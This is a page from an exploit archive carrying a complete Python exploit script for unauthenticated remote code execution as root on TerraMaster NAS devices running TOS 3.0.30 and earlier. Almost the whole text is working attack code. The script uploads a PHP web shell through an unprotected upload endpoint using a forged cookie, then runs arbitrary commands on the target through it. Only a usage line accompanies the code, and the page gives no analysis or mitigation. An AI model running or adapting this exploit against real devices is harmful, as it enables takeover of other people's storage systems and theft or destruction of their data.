TerraMaster F2-420 NAS TOS 3.0.30 - Unauthenticated Remote Code Execution as Root

2017-05-30 21:05:02

# Source: https://www.evilsocket.net/2017/05/30/Terramaster-NAS-Unauthenticated-RCE-as-root/

#!/usr/bin/python
# coding: utf8
#
# Exploit: Unauthenticated RCE as root.
# Vendor: TerraMaster
# Product: TOS <= 3.0.30 (running on every NAS)
# Author: Simone 'evilsocket' Margaritelli <<a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="482d3e21243b272b232d3c08383a273c272625292124662b2725">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>>
import sys
import requests
def upload( address, port, filename, path = '/usr/www/' ):
url = "http://%s:%d/include/upload.php?targetDir=%s" % ( address, port, path )
try:
files = { 'file': open( filename, 'rb' ) }
cookies = { 'kod_name': '1' } # LOL :D
r = requests.post(url, files=files, cookies=cookies)
if r.text != '{"jsonrpc" : "2.0", "result" : null, "id" : "id"}':
print "! Unexpected response, exploit might not work:\n%s\n" % r.text
return True
except Exception as e:
print "\n! ERROR: %s" % e
return False
def rce( address, port, command ):
with open( '/tmp/p.php', 'w+t' ) as fp:
fp.write( "<?php system('%s'); ?>" % command )
if upload( address, port, '/tmp/p.php' ) == True:
try:
url = "http://%s:%d/p.php" % ( address, port )
return requests.get(url).text
except Exception as e:
print "\n! ERROR: %s" % e
return None
if len(sys.argv) < 3:
print "Usage: exploit.py <ip|hostname> <command> (port=8181)\n"
quit()
target = sys.argv[1]
command = sys.argv[2]
port = 8181 if len(sys.argv) < 4 else int(sys.argv[3])
out = rce( target, port, command )
if out is not None:
print out.strip()

Fixes

No fixes

In order to submit a new fix you need to be registered.